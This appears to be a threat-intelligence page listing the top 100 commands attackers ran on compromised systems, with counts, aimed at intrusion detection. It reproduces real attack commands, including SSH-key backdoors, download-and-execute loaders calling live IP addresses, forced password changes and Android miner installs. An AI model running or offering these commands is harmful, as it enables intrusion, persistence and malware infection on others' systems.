Updated: February 2026
Top 100 Malicious Commands
Most executed commands by attackers after gaining system access. Useful for intrusion detection and incident response.
4147 commands in 24h
1.
$
/bin/./uname -s -v -n -r -m24 IPs222x
2.
$
Enter new UNIX password:94 IPs198x
3.
$
lockr -ia .ssh150 IPs191x
4.
$
cat /proc/uptime 2 > /dev/null | cut -d. -f126 IPs165x
5.
$
uname -a133 IPs160x
6.
$
cat /proc/cpuinfo | grep model | grep name | wc -l123 IPs153x
7.
$
cd ~; chattr -ia .ssh; lockr -ia .ssh122 IPs149x
8.
$
whoami118 IPs148x
9.
$
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~119 IPs147x
10.
$
cat /proc/cpuinfo | grep name | wc -l121 IPs146x
11.
$
df -h | head -n 2 | awk 'FNR == 2 {print $2;}'118 IPs145x
12.
$
uname -m122 IPs144x
13.
$
crontab -l118 IPs143x
14.
$
lscpu | grep Model117 IPs141x
15.
$
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'119 IPs141x
16.
$
uname112 IPs139x
17.
$
w111 IPs139x
18.
$
which ls112 IPs134x
19.
$
top110 IPs134x
20.
$
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'108 IPs131x
21.
$
uname -s -v -n -m 2 > /dev/null52 IPs131x
22.
$
ls -lh $(which ls)103 IPs123x
23.
$
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version53 IPs123x
24.
$
uname -m 2 > /dev/null26 IPs87x
25.
$
rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;54 IPs62x
26.
$
echo hello8 IPs50x
27.
$
uname -s -v -n -r -m15 IPs41x
28.
$
cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps1 IPs14x
29.
$
/ip cloud print9 IPs14x
30.
$
curl21 IPs14x
31.
$
echo "cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps" | sh1 IPs14x
32.
$
cd /data/local/tmp/; busybox wget http://193.26.115.122/w.sh; sh w.sh; curl http://193.26.115.122/c.sh; sh c.sh; wget http://193.26.115.122/wget.sh; sh wget.sh; curl http://193.26.115.122/wget.sh; sh wget.sh; busybox wget http://193.26.115.122/wget.sh; sh wget.sh; busybox curl http://193.26.115.122/wget.sh; sh wget.sh5 IPs13x
33.
$
locate D877F783D5D3EF8Cs10 IPs10x
34.
$
ifconfig8 IPs8x
35.
$
ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*7 IPs7x
36.
$
echo Hi | cat -n7 IPs7x
37.
$
rm -rf /data/local/tmp/*2 IPs6x
38.
$
ps -ef | grep '[Mm]iner'6 IPs6x
39.
$
shell3 IPs6x
40.
$
ps | grep '[Mm]iner'6 IPs6x
41.
$
cat /proc/cpuinfo6 IPs6x
42.
$
system3 IPs5x
43.
$
nproc2 IPs5x
44.
$
if [ [ ! -d ${HOME}/.ssh ] ]2 IPs5x
45.
$
uname -s -m4 IPs4x
46.
$
q2 IPs4x
47.
$
echo "$(getprop ro.product.name 2>/dev/null) $(whoami 2>/dev/null)"2 IPs4x
48.
$
then2 IPs4x
49.
$
Accept-Encoding: gzip2 IPs4x
50.
$
chmod 0755 /data/local/tmp/nohup2 IPs4x
51.
$
pm path com.google.home.tv2 IPs4x
52.
$
tcpdump -D1 IPs3x
53.
$
sh3 IPs3x
54.
$
rm /data/local/tmp/tv.apk2 IPs3x
55.
$
pm path com.ufo.miner2 IPs3x
56.
$
getprop ro.build.version.sdk1 IPs3x
57.
$
enable3 IPs3x
58.
$
/data/local/tmp/nohup su -c /data/local/tmp/log1 IPs2x
59.
$
cd /data/local/tmp/; rm -rf *; busybox wget http://103.116.52.126/abc1.sh; sh abc1.sh; wget http://103.116.52.126/abc1.sh; sh abc1.sh; curl http://103.116.52.126/abc1.sh; sh abc1.sh; busybox wget http://103.116.52.126/abc2.sh; sh abc2.sh; wget http://103.116.52.126/abc2.sh; sh abc2.sh; curl http://103.116.52.126/abc2.sh; sh abc2.sh; busybox wget http://103.116.52.126/abc3.sh; sh abc3.sh; wget http://103.116.52.126/abc3.sh; sh abc3.sh; curl http://103.116.52.126/abc3.sh; sh abc3.sh;2 IPs2x
60.
$
am start -n com.ufo.miner/com.example.test.MainActivity1 IPs2x
61.
$
/data/local/tmp/nohup /data/local/tmp/trinity1 IPs2x
62.
$
while read i2 IPs2x
63.
$
am start -n com.google.home.tv/com.example.test.MainActivity1 IPs2x
64.
$
/data/local/tmp/nohup /data/local/tmp/log1 IPs2x
65.
$
rm .s; exit2 IPs2x
66.
$
ps | grep trinity1 IPs2x
67.
$
dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s2 IPs2x
68.
$
ps | grep rig1 IPs2x
69.
$
rm -f /data/local/tmp/ufo.apk1 IPs2x
70.
$
ps | grep log1 IPs2x
71.
$
pm install /data/local/tmp/tv.apk1 IPs2x
72.
$
chmod 0755 /data/local/tmp/trinity1 IPs2x
73.
$
pm install /data/local/tmp/ufo.apk1 IPs2x
74.
$
chmod 0755 /data/local/tmp/log1 IPs2x
75.
$
/data/local/tmp/nohup su -c /data/local/tmp/trinity1 IPs2x
76.
$
echo "abcd1234\nGDq9YDyMt7cc\nGDq9YDyMt7cc\n"|passwd1 IPs1x
77.
$
echo "Password1\nqswOLAd4ifCu\nqswOLAd4ifCu\n"|passwd1 IPs1x
78.
$
cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox OAXAN1 IPs1x
79.
$
echo "Password1\nnhzVKeW2kznz\nnhzVKeW2kznz\n"|passwd1 IPs1x
80.
$
echo "Passw0rd\nLbkrOeN4GmXF\nLbkrOeN4GmXF\n"|passwd1 IPs1x
81.
$
cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox EWGDZ1 IPs1x
82.
$
arch_info=$(uname -m); cpu_count=$(nproc); echo -e "XK8wyfte\nXK8wyfte" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk1 IPs1x
83.
$
echo "P@ssw0rd\ncIVX8wnpBUNE\ncIVX8wnpBUNE\n"|passwd1 IPs1x
84.
$
echo "E1ementa!5\nVgmnQPzed1QX\nVgmnQPzed1QX\n"|passwd1 IPs1x
85.
$
echo "888888\nZeT0bu1LiUS2\nZeT0bu1LiUS2\n"|passwd1 IPs1x
86.
$
echo "1q2w3e4r5t6y\nc6W4wklHM4Xk\nc6W4wklHM4Xk\n"|passwd1 IPs1x
87.
$
cd /data/local/tmp/; wget http://212.85.24.46:84/cat.sh || curl http://212.85.24.46:84/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android1 IPs1x
88.
$
arch_info=$(uname -m); cpu_count=$(nproc); echo -e "OAKTuBfB\nOAKTuBfB" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk1 IPs1x
89.
$
echo "1q2w3e4r5t6y\n6CbLN6iupzh5\n6CbLN6iupzh5\n"|passwd1 IPs1x
90.
$
echo "123\nsN0wot835d8Y\nsN0wot835d8Y\n"|passwd1 IPs1x
91.
$
echo "123\nTAM8sqbINqE2\nTAM8sqbINqE2\n"|passwd1 IPs1x
92.
$
echo "123\nOfuPWA7oGCAw\nOfuPWA7oGCAw\n"|passwd1 IPs1x
93.
$
cd /data/local/tmp/; busybox wget http://94.156.152.217/kla.sh; sh kla.sh; curl http://94.156.152.217/kla.sh; sh kla.sh; wget http://94.156.152.217/kla.sh; sh kla.sh; curl http://94.156.152.217/kla.sh; sh kla.sh; busybox wget http://94.156.152.217/kla.sh; sh kla.sh; busybox curl http://94.156.152.217/kla.sh; sh kla.sh1 IPs1x
94.
$
echo "123\nIon55ygkCupL\nIon55ygkCupL\n"|passwd1 IPs1x
95.
$
echo "ionela\n8gh1L0KSvx8N\n8gh1L0KSvx8N\n"|passwd1 IPs1x
96.
$
echo "1234\ngEMKhmepHGya\ngEMKhmepHGya\n"|passwd1 IPs1x
97.
$
echo "guest\nqHzZW803CeSw\nqHzZW803CeSw\n"|passwd1 IPs1x
98.
$
echo "guest\na8lkKSoPk72U\na8lkKSoPk72U\n"|passwd1 IPs1x
99.
$
echo "gast\nSYXz70enXjZt\nSYXz70enXjZt\n"|passwd1 IPs1x
100.
$
echo "gast\nPUVHYQ0KQP04\nPUVHYQ0KQP04\n"|passwd1 IPs1x
Reconnaissance
uname, whoami, cat /etc/passwd
Download
wget, curl, tftp
Persistence
crontab, chmod, chattr
Lateral Movement
ssh, scp, ping
Detection Use
These commands can be used to create detection rules in SIEM, IDS/IPS, and monitoring systems. Monitor these patterns in your logs to detect intrusions.